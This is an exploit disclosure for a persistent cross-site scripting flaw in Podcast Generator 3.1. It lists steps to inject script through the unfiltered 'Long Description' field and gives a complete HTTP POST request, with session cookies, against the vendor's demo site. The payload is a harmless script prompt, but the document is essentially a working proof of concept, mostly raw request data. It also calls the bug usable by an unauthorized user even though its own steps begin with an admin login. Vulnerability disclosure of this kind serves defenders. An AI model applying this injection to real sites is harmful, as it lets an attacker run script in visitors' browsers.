112 lines
No EOL
3.5 KiB
Text
112 lines
No EOL
3.5 KiB
Text
# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)
|
|
# Date: 13/05/2021
|
|
# Exploit Author: Ayşenur KARAASLAN
|
|
# Vendor Homepage: https://podcastgenerator.net/demoV2/
|
|
# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip
|
|
# Version: < 3.1.1
|
|
# CVE: N/A
|
|
|
|
Podcast Generator is an open source Content Management System written in PHP and specifically designed for podcast publishing.
|
|
|
|
#Description
|
|
The following is PoC to use the XSS bug with unauthorized user.
|
|
|
|
1. Login to your admin account.
|
|
2. "Upload New Episode" or "Edit" field has got "Long Description". Long Description field is not filtered. It is possible to place JavaScript code.
|
|
3. Click the Home button
|
|
4. Click "More" button of created or edited episode.
|
|
|
|
# Vulnerable Parameter Type: POST
|
|
# Vulnerable Parameter: long_description
|
|
# Attack Pattern: <script>prompt("Aysenur-PoC")</script>
|
|
|
|
#PoC
|
|
HTTP Request:
|
|
|
|
POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1
|
|
Host: podcastgenerator.net
|
|
Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4;
|
|
_ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725
|
|
Content-Length: 1590
|
|
Cache-Control: max-age=0
|
|
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
|
|
Sec-Ch-Ua-Mobile: ?0
|
|
Upgrade-Insecure-Requests: 1
|
|
Origin: https://podcastgenerator.net
|
|
Content-Type: multipart/form-data;
|
|
boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
|
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-User: ?1
|
|
Sec-Fetch-Dest: frame
|
|
Referer:
|
|
https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
|
Connection: close
|
|
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="userfile"
|
|
|
|
aysenurxss-poc.jpg
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="title"
|
|
|
|
Aysenur-PoC
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="description"
|
|
|
|
poc
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="countdown"
|
|
|
|
255
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="category[]"
|
|
|
|
about
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="Day"
|
|
|
|
13
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="Month"
|
|
|
|
5
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="Year"
|
|
|
|
2021
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="Hour"
|
|
|
|
14
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="Minute"
|
|
|
|
29
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="long_description"
|
|
|
|
<script>prompt("aysenur-xss")</script>
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="keywords"
|
|
|
|
poc
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="explicit"
|
|
|
|
no
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="auth_name"
|
|
|
|
aysenur
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
|
|
Content-Disposition: form-data; name="auth_email"
|
|
|
|
aysenur@emailaddress.com
|
|
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd-- |